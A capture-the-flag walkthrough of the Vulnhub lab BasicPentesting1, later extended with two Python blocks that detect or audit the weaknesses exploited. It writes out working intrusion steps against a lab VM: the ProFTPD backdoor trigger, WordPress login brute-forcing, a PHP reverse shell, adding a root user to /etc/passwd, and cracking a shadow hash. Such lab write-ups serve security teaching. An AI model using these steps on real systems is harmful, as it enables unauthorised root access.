Vulnhub Writeup : BasicPentesting1

Box Stats :

Box Information | Details
--------------- | ----------------
Box Name        | BasicPentesting1
Series          | Basic Pentesting
Release Date    | 8 Dec 2017
Author          | Josiah Pierce
Difficulty      | Easy
Download Link   | Link

Network Scan

The IP of the target box is 192.168.1.15. We start with an nmap scan of the target:


$ nmap -sV --top-ports 1000 192.168.1.15 -oN nmap.txt

 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-28 18:53 UTC
 Nmap scan report for 192.168.1.15
 Host is up (0.0034s latency).
 Not shown: 997 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD 1.3.3c
 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds

Nothing unusual, but a quick search for ProFTPD 1.3.3c reveals that this release shipped with a backdoor. To trigger it we only need to connect to port 21 with netcat and send the trigger “HELP ACIDBITCHEZ”.

$ nc 192.168.1.15 21

220 ProFTPD 1.3.3c Server (vtcsec) [192.168.1.15]
HELP ACIDBITCHEZ
uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

To get a proper interactive shell we can use the python pty trick: python -c 'import pty;pty.spawn("/bin/bash")'

$ nc 192.168.1.15 21

python -c 'import pty;pty.spawn("/bin/bash")';
root@vtcsec:/#

We have root access to the machine. Now let's find other ways to get root.

Web Application Reconnaissance

The nmap scan shows that port 80 is open, which means a web server is running.

In the listing above, 192.168.1.15 is the IP address of our VM.

Directory Bruteforce

Brute-forcing directories with dirb:

$ dirb http://192.168.1.15

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Sep 28 19:16:46 2019
URL_BASE: http://192.168.1.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.15/ ----
+ http://192.168.1.15/index.html (CODE:200|SIZE:177)                                                                                                                           
==> DIRECTORY: http://192.168.1.15/secret/                                                                                                                                     
+ http://192.168.1.15/server-status (CODE:403|SIZE:277)                                                                                                                        

---- Entering directory: http://192.168.1.15/secret/ ----
+ http://192.168.1.15/secret/index.php (CODE:301|SIZE:0)                                                                                                                       
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/                                                                                                                            
==> DIRECTORY: http://192.168.1.15/secret/wp-content/                                                                                                                          
==> DIRECTORY: http://192.168.1.15/secret/wp-includes/                                                                                                                         
+ http://192.168.1.15/secret/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                     

---- Entering directory: http://192.168.1.15/secret/wp-admin/ ----
+ http://192.168.1.15/secret/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/css/                                                                                                                        
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/images/                                                                                                                     
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/includes/                                                                                                                   
+ http://192.168.1.15/secret/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                              
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/js/                                                                                                                         
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/maint/                                                                                                                      
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/network/                                                                                                                    
==> DIRECTORY: http://192.168.1.15/secret/wp-admin/user/                                                                                                                       

---- Entering directory: http://192.168.1.15/secret/wp-content/ ----
+ http://192.168.1.15/secret/wp-content/index.php (CODE:200|SIZE:0)                                                                                                            
==> DIRECTORY: http://192.168.1.15/secret/wp-content/plugins/                                                                                                                  
==> DIRECTORY: http://192.168.1.15/secret/wp-content/themes/                                                                                                                   
==> DIRECTORY: http://192.168.1.15/secret/wp-content/upgrade/                                                                                                                  
==> DIRECTORY: http://192.168.1.15/secret/wp-content/uploads/                                                                                                                  

---- Entering directory: http://192.168.1.15/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-admin/network/ ----
+ http://192.168.1.15/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                      
+ http://192.168.1.15/secret/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                      

---- Entering directory: http://192.168.1.15/secret/wp-admin/user/ ----
+ http://192.168.1.15/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                         
+ http://192.168.1.15/secret/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                         

---- Entering directory: http://192.168.1.15/secret/wp-content/plugins/ ----
+ http://192.168.1.15/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                    

---- Entering directory: http://192.168.1.15/secret/wp-content/themes/ ----
+ http://192.168.1.15/secret/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                     

---- Entering directory: http://192.168.1.15/secret/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.15/secret/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Sep 28 19:17:13 2019

The scan above shows a hidden WordPress blog at http://192.168.1.15/secret/, so let's check it out.

The blog redirects to http://vtcsec/secret/, so we add vtcsec to our /etc/hosts file.

$ echo "192.168.1.15 vtcsec" | sudo tee -a /etc/hosts

Now the WordPress blog opens properly.

WPScan on WordPress Blog

$ wpscan --url http://192.168.1.15/secret/ --enumerate u

        __          _______   _____                                                                                                                                                                                
        \ \        / /  __ \ / ____|                                                                                                                                                                               
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ _                                                                                                                                                              
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                                                               
           \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                                                              
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                                                              

        WordPress Security Scanner by the WPScan Team                                                                                                                                                              
                       Version 3.7.1                                                                                                                                                                               
      WPScan.io - Online WordPress Vulnerability Scanner                                                                                                                                                           
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_                                                                                                                                                            
_______________________________________________________________                                                                                                                                                                                                                                                                                        
[+] URL: http://192.168.1.15/secret/                                                                                                                                                                               
[+] Started: Sun Sep 29 05:46:41 2019                                                                                                                                                                                                     
Interesting Finding(s):                                                                                                                                                                                            
[+] http://192.168.1.15/secret/                                                                                                                                                                                    
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)                                                                                                                                                               
 | Found By: Headers (Passive Detection)                                                                                                                                                                           
 | Confidence: 100%                                                                                                                                                                                                
[+] http://192.168.1.15/secret/xmlrpc.php                                                                                                                                                                          
 | Found By: Direct Access (Aggressive Detection)       
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.1.15/secret/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.15/secret/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.1.15/secret/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.11 identified (Latest, released on 2019-09-05).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.15/secret/, Match: '-release.min.js?ver=4.9.11'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.15/secret/, Match: 'WordPress 4.9.11'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/register.

[+] Finished: Sun Sep 29 05:46:42 2019
[+] Requests Done: 21
[+] Cached Requests: 29
[+] Data Sent: 5.049 KB
[+] Data Received: 10.292 KB
[+] Memory used: 90.594 MB
[+] Elapsed time: 00:00:00

The scan above identified the user admin. Now let's brute-force the WordPress login, using a simple password wordlist.

$ wpscan -U admin -P common.txt --url http://192.168.1.15/secret/

The output shows that the password is also admin.

 .....
 [i] Valid Combinations Found:
  | Username: admin, Password: admin
 .....

Now login to wordpress with above credentials.
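Seen from the server side, both wpscan steps above (author-ID enumeration and the wp-login.php password guessing) leave a clear pattern in the Apache access log. The following is an added example, not part of the original write-up, that flags those two patterns; the log lines are constructed to resemble this scan, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log line: IP ident user [time] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")   # author-ID probe, as wpscan --enumerate u sends
LOGIN_PATH = "wp-login.php"                   # target of the password guessing

def parse(line):
    """Parse one access-log line; None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec.pop("ts"), TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def detect(lines, author_threshold=5, login_threshold=10, window=timedelta(minutes=5)):
    """Return {ip: [finding, ...]}: an IP probing >= author_threshold distinct author IDs,
    or sending >= login_threshold POSTs to wp-login.php inside `window` (thresholds assumed)."""
    author_ids, login_posts = defaultdict(set), defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        probe = AUTHOR_RE.search(rec["path"])
        if probe:
            author_ids[rec["ip"]].add(probe.group(1))
        if rec["method"] == "POST" and rec["path"].endswith(LOGIN_PATH):
            login_posts[rec["ip"]].append(rec["time"])
    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].append(f"author enumeration: {len(ids)} author IDs probed")
    for ip, times in login_posts.items():
        times.sort()
        start = 0                                  # sliding window over the sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= login_threshold:
                findings[ip].append(f"login brute force: {login_threshold}+ POSTs to {LOGIN_PATH} in {window}")
                break
    return dict(findings)

def sample_log(scanner="192.168.1.10"):
    """Constructed lines mimicking the wpscan runs above (not captured traffic)."""
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" {s} 512 "-" "WPScan v3.7.1"'
    t = datetime(2019, 9, 29, 5, 46, 41, tzinfo=timezone.utc)
    lines = []
    for n in range(1, 11):                         # ?author=1 .. ?author=10
        lines.append(fmt.format(ip=scanner, ts=t.strftime(TS_FMT), m="GET", p=f"/secret/?author={n}", s=301))
        t += timedelta(seconds=1)
    for _ in range(12):                            # twelve password guesses, two seconds apart
        lines.append(fmt.format(ip=scanner, ts=t.strftime(TS_FMT), m="POST", p="/secret/wp-login.php", s=200))
        t += timedelta(seconds=2)
    lines.append(fmt.format(ip="192.168.1.20", ts=t.strftime(TS_FMT), m="GET", p="/secret/", s=200))
    return lines
```

On a real server, feed detect() the lines of the Apache access log; the scanning host is reported with one finding per pattern.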

Getting a shell using WordPress

Link for php reverse shell : Github Link

Change the IP address and port number in the script, then put it into the index.php file in WordPress.

Now start a netcat listener:

$ nc -lvvp 1234

Then open the WordPress page:

$ nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from vtcsec 52724 received!
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:46:01 up 2 min,  0 users,  load average: 0.58, 0.60, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

We got a shell, but it is not a root shell; we need to escalate privileges to root.

Getting root Privilege

Method 1

By overwriting the /etc/passwd file : As we can see, /etc/passwd is readable and writable by all users.

$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 2364 Nov 16  2017 /etc/passwd

So by appending a new user with UID 0 (root privileges) and a known password to /etc/passwd, we can get a root shell.

Preparing the new user entry to append to the file : The root user's entry looks like this :

root:x:0:0:root:/root:/bin/bash

where the colon-separated fields are as follows :

Username : Encrypted_Password : UserID : GroupID : UserID_Info : Home_Directory : Shell

In the password field there is an x, which means the password hash is stored in /etc/shadow. Now let's create an encrypted password for the new user :

$ openssl passwd -1 -salt hack password123

 $1$hack$MLgkAESrYp7kzYz0Ex2fV/

Where :

  • -1 : MD5-based password algorithm (other options are -5 for SHA-256 and -6 for SHA-512)
  • -salt : the salt, which is “hack”
  • the password is password123

Now we append the line below to /etc/passwd :

newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
echo "newroot:\$1\$hack\$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash" >> /etc/passwd

Note : Put a \ before every $ in the password field, otherwise the shell will try to interpret it as a variable. Now try to log in as our newly created user.

$ su - newroot
 
 su: must be run from a terminal

But it throws an error, which means we need a tty; we can get one with the python pty trick.

python -c 'import pty;pty.spawn("/bin/bash");'
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@vtcsec:/$
www-data@vtcsec:/$ su - newroot
su - newroot
Password: password123

root@vtcsec:~# whoami
whoami
root
root@vtcsec:~#

Yep, we got the root shell!

Method 2

By cracking the passwords of existing users : This method only works if /etc/shadow is world-readable, which it is not by default. In this case, however, we can read /etc/shadow :

$ cat /etc/shadow
 
root:!:17484:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
....
....
....
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:7484:0:99999:7:::
mysql:!:17486:0:99999:7:::
sshd:*:17486:0:99999:7:::

The shadow file stores the actual password hash of each user account together with password-ageing properties, i.e. it stores the secure account information.

As we can see, the user marlinspike has a hashed password :

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::

Now save the above line to a file pass.txt and try to crack the hash with John the Ripper (john).

root@ae3e2e69805d:~/# john pass.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-09-29 09:24) 4.347g/s 34.78p/s 34.78c/s 34.78C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root@ae3e2e69805d:~/# john --show pass.txt 

marlinspike:marlinspike:17484:0:99999:7:::

1 password hash cracked, 0 left

The password for marlinspike is marlinspike; now let's log in to the marlinspike account.

$ su - marlinspike
su: must be run from a terminal

This means we need a tty shell; then we can switch to root.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vtcsec:/$ su - marlinspike    
su - marlinspike
Password: marlinspike
 
marlinspike@vtcsec:~$ whoami
whoami
marlinspike
 
marlinspike@vtcsec:~$ sudo su
sudo su
[sudo] password for marlinspike: marlinspike
 
root@vtcsec:/home/marlinspike# whoami
whoami
root
 
root@vtcsec:/home/marlinspike# 

We got root shell again.
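Both methods above rest on file-permission mistakes: a world-writable /etc/passwd (Method 1) and a world-readable /etc/shadow (Method 2). The following is an added example, not part of the original write-up, that audits both files for those conditions, for the traces Method 1 leaves behind (an extra UID 0 account, a hash stored directly in /etc/passwd) and for weak md5crypt hashes like the one openssl passwd -1 produces; the file contents and modes are constructed samples mirroring the box, and the legacy entry is invented.

```python
import re
import stat

# Constructed contents mirroring the box (a few entries only, not the full files)
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
newroot:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:0:0:root:/root:/bin/bash
"""
SAMPLE_SHADOW = """root:!:17484:0:99999:7:::
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
legacy:$1$hack$MLgkAESrYp7kzYz0Ex2fV/:17484:0:99999:7:::
sshd:*:17486:0:99999:7:::
"""
LOCKED = ("*", "!", "!!")                                 # no password login possible
WEAK_ALGOS = {"1": "md5crypt", "des": "traditional DES"}  # cheap to crack offline

def hash_algo(pw):
    """'6' for $6$..., '1' for $1$..., 'des' for a bare 13-character DES hash."""
    m = re.match(r"^\$([A-Za-z0-9]+)\$", pw)
    return m.group(1) if m else "des"

def audit_passwd(text, mode):
    """Findings for /etc/passwd content `text` whose permission bits are `mode`."""
    findings = []
    if mode & stat.S_IWOTH:                               # -rw-rw-rw- as seen on the box
        findings.append("/etc/passwd is world-writable (Method 1 precondition)")
    uid0 = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"malformed entry: {line}")
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0":
            uid0.append(user)
        if pw == "":
            findings.append(f"{user}: empty password field")
        elif pw != "x" and pw not in LOCKED:
            findings.append(f"{user}: password hash kept in /etc/passwd, bypasses shadow")
    extra = [u for u in uid0 if u != "root"]
    if extra:
        findings.append(f"extra UID 0 accounts: {', '.join(extra)}")
    return findings

def audit_shadow(text, mode):
    """Findings for /etc/shadow content `text` whose permission bits are `mode`."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append("/etc/shadow is world-readable (Method 2 precondition)")
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append(f"{user}: empty password")
        elif pw not in LOCKED and hash_algo(pw) in WEAK_ALGOS:
            findings.append(f"{user}: weak hash algorithm ({WEAK_ALGOS[hash_algo(pw)]})")
    return findings
```

On a live system, pass open('/etc/passwd').read() together with os.stat('/etc/passwd').st_mode, and the same for /etc/shadow (which needs root to read).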
